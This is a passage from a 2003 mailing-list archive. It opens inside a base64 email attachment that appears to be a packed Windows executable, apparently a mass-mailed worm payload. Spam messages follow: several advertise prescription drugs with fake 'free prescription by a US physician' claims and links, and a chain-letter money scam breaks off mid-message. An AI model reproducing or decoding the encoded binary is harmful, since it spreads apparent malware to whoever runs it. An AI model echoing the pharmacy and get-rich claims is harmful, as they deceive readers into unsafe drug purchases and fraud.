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
q4sjiRR9UgVZOmKWENpaYm0AAAkJCAgKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAALsBAABYQzAwMTgxNWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAC
AABYQzAwMTgxNWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMACAABYQzAwMTgxNWQAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAzAcAAFhDMDAxODE1ZA==
--_NextPart_000_0167C188--


From b438aoj@hotmail.com Tue Sep  2 21:51:47 2003
Return-Path: <b438aoj@hotmail.com>
Received: from 200-158-126-250.dsl.telesp.net.br (200-158-126-250.dsl.telesp.net.br [200.158.126.250])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h831pFRY006633;
	Tue, 2 Sep 2003 21:51:31 -0400 (EDT)
Received: from [6.51.164.111] by 200-158-126-250.dsl.telesp.net.br id 43B6V18n70vq; Wed, 03 Sep 2003 13:44:30 -0100
Message-ID: <btcj2ri-p0g5@r9jll.yh5>
From: "Heidi Lilly" <b438aoj@hotmail.com>
Reply-To: "Heidi Lilly" <b438aoj@hotmail.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: SOMA....US Doctors FILL and SHIP Directly to Your DOORSTEP   *  p vxrjobizejhcy
Date: Wed, 03 Sep 03 13:44:30 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="D_7.58_0__E2_1"
X-Priority: 1
X-MSMail-Priority: High


--D_7.58_0__E2_1
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><FONT SIZE=3D3 PTSIZE=3D12><B>Get ANY Prescription DRUG You WANT!!<B=
R> OUR US Doctors will Write YOU a Prescription for FREE!<BR> You get it N=
EXTDAY via FedEx !!</FONT><FONT COLOR=3D"#000000" BACK=3D"#ffffff"
style=3D=
"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=
=3D"Arial" LANG=3D"0"></B><BR></FONT><FONT COLOR=3D"#0000ff" BACK=3D"#ffff=
ff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SAN=
SSERIF" FACE=3D"Arial" LANG=3D"0"><B><A HREF=3D"http://www.dpils.biz/vpr63=
34/">LOOK_HERE</A></B></FONT><FONT COLOR=3D"#000000" BACK=3D"#ffffff" styl=
e=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" =
FACE=3D"Arial" LANG=3D"0"></B><BR> <BR> <BR> <BR> </FONT></HTML>=
fwvqx xqga rkqjjfxgosxs i nollcxxvjy qtpecfhymoi
cdbuo
  nwml ewf lezdheclxqzpo 

--D_7.58_0__E2_1--


From ozcn7apz@msn.com Wed Sep  3 05:10:57 2003
Return-Path: <ozcn7apz@msn.com>
Received: from 160.36.58.108 ([213.47.228.126])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h839ATRY003125;
	Wed, 3 Sep 2003 05:10:38 -0400 (EDT)
Received: from [72.9.139.32]
	by 160.36.58.108 with ESMTP id <296730-79539>
	for <199902071506.kaa20808@netlib2.cs.utk.edu>; Wed, 03 Sep 2003 16:07:43 -0700
Message-ID: <3$vn52lt-5$-3atpxj3af@g1quvy83z>
From: "Amalia Morin" <ozcn7apz@msn.com>
Reply-To: "Amalia Morin" <ozcn7apz@msn.com>
To: <199902071506.kaa20808@netlib2.cs.utk.edu>, <anon@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: New Pharmacy, Best Deals                           .	 wcucyen
Date: Wed, 03 Sep 03 16:07:43 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C2A39.6.F906A_B5"
X-Priority: 1
X-MSMail-Priority: High


--C2A39.6.F906A_B5
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><FONT  COLOR=3D"#8000ff" SIZE=3D3 PTSIZE=3D12><B>SOMA</FONT><FONT CO=
LOR=3D"#8000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff"
SIZE=3D=
2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0">,..</FONT><FO=
NT COLOR=3D"#800040" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" =
SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0">..Bran=
d Name,</FONT><FONT COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGROUND=
-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" =
LANG=3D"0">YES</FONT><FONT COLOR=3D"#800040" BACK=3D"#ffffff" style=3D"BAC=
KGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"=
Arial" LANG=3D"0">....</FONT><FONT COLOR=3D"#8000ff" BACK=3D"#ffffff" styl=
e=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" =
FACE=3D"Arial" LANG=3D"0">the REAL STUFF !!<BR></FONT><FONT  COLOR=3D"#ff0=
080" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2
PTSIZE=3D=
10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0">IONAMIN</FONT><FONT  COL=
OR=3D"#8000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff"
SIZE=3D=
2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0">...</FONT><FO=
NT  COLOR=3D"#008000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff"=
 SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0">Tenua=
te, </FONT><FONT  COLOR=3D"#ff0080" BACK=3D"#ffffff" style=3D"BACKGROUND-C=
OLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
NG=3D"0">Adipex</FONT><FONT  COLOR=3D"#008000" BACK=3D"#ffffff" style=3D"B=
ACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF"
FACE=3D=
"Arial" LANG=3D"0"><BR>Low Price, Fast Delivery, PRIVACY !</FONT><FONT COL=
OR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff"
SIZE=3D=
2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"></B><BR>FREE =
Prescription by a Licensed US Physician. <BR>Your medication will be dispe=
nsed by a Licensed US Pharmacy. <BR></FONT><FONT  COLOR=3D"#408080"
BACK=3D=
"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12
FAMILY=3D=
"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><B>Requests received by 2:00 PM EST =
will arrive <BR>the very next business day.</FONT><FONT  COLOR=3D"#000000"=
 BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10=
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"></B><BR></FONT><FONT  COLO=
R=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
4 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"><B><A HREF=3D=
"http://www.dpils.biz/vpr6334/">MEDS_HERE</A></B></FONT><FONT COLOR=3D"#00=
0000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=
=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"></B><BR></FONT></HTML=
>tqbhcuujzjphcdzmfvrpkrgamio
osmduwi ilil epz

--C2A39.6.F906A_B5--


From sdhvnokglv@concentric.com Wed Sep  3 14:33:14 2003
Return-Path: <sdhvnokglv@concentric.com>
Received: from pcp711883pcs.alxndr01.va.comcast.net (SeX_VFSBCA@pcp711883pcs.alxndr01.va.comcast.net [68.50.74.137])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h83IXCRY009535;
	Wed, 3 Sep 2003 14:33:13 -0400 (EDT)
Message-ID: <49e3-6pxjd4394r0-r2ll5f@1gyi.6tw38qct>
From: "Aurelio Escobar" <sdhvnokglv@concentric.com>
Reply-To: "Aurelio Escobar" <sdhvnokglv@concentric.com>
To: <199902071506.kaa20808@netlib2.cs.utk.edu>, <anon@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: The Best Internet Pharmacy Delivers Meds Overnight                           .	  anytclzx d xv
Date: Wed, 03 Sep 03 16:26:01 GMT
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F.D6D_0F1F..AFFA_FFB_"
X-Priority: 1
X-MSMail-Priority: High


--F.D6D_0F1F..AFFA_FFB_
Content-Type: text/html;
Content-Transfer-Encoding: base64

PEhUTUw+PEZPTlQgIFNJWkU9MiBQVFNJWkU9MTA+U09NQSxJT05BTUlOLi4uIExvdyBQcmlj
ZSwgRmFzdCBEZWxpdmVyeSwgUFJJVkFDWSE8QlI+RkRBIEFwcHJvdmVkIE1lZGljYXRpb25z
IG9ubGluZS4gU09NQSwgLEFESVBFWCxWaWFncmEsPEJSPmFuZCBNVUNIIE1PUkUuPEJSPkdv
IE9ubGluZS4gRmlsbCBvdXQgeW91ciBQcmVzY3JpcHRpb24gUmVxdWVzdC4gWW91ciByZXF1
ZXN0IHdpbGwgYmU8QlI+cmV2aWV3ZWQgYnkgYSBMaWNlbnNlZCBVUyBQaHlzaWNpYW4uIElm
IEFwcHJvdmVkLCB5b3VyIG1lZGljYXRpb24gd2lsbCBiZTxCUj5kaXNwZW5zZWQgYnkgYSBM
aWNlbnNlZCBVUyBQaGFybWFjeS4gUmVxdWVzdHMgcmVjZWl2ZWQgYnkgMjowMCBQTSBFU1Qg
d2lsbCBhcnJpdmU8QlI+dGhlIHZlcnkgbmV4dCBidXNpbmVzcyBkYXkuPEJSPjxBIEhSRUY9
Imh0dHA6Ly93d3cudGhlYmVzdHJ4bWVkczEzLmNvbS92cHI2MzM0Ij5ZRVNfSE9PS19NRV9V
UDwvQT48QlI+PEJSPjxCUj48QlI+PEJSPjwvRk9OVD48L0hUTUw+ZHpneWZpIA==



--F.D6D_0F1F..AFFA_FFB_--


From ualvm7@www.first.gmd.de Wed Sep  3 16:58:58 2003
Return-Path: <ualvm7@www.first.gmd.de>
Received: from fontenay-2-82-67-168-157.fbx.proxad.net (fontenay-2-82-67-168-157.fbx.proxad.net [82.67.168.157])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h83KwsRY019969
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 3 Sep 2003 16:58:56 -0400 (EDT)
Received: from [23.70.127.136] by fontenay-2-82-67-168-157.fbx.proxad.net; Wed, 03 Sep 2003 09:46:32 +0000
Message-ID: <z$688wx6k-5c1b1g7aa80374g6kc@a7ibj>
From: "Geneva Darden" <ualvm7@www.first.gmd.de>
Reply-To: "Geneva Darden" <ualvm7@www.first.gmd.de>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: PARENTS OF 15 - YEAR OLD - FIND $71,000 CASH HIDDEN IN HIS CLOSET! cf
Date: Wed, 03 Sep 03 09:46:32 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8_61D0F_D.2_964"
X-Priority: 3
X-MSMail-Priority: Normal


--8_61D0F_D.2_964
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>P01</title>
</head>
<body text=3D"#000000" bgcolor=3D"#009900" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
&nbsp;
<center><table CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF" class=3D"=
center" >
<tr>
<td class=3D"backImg">&nbsp;
<center>
<br><b><font face=3D"Arial">DO NOT DELETE THIS - <u>READ FIRST</u> - IT WI=
LL
CHANGE YOUR LIFE!</font></b>
<p><font face=3D"Arial"><font size=3D+2>This <b>Really Works</b>!</font></=
font>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>Give=
 Your
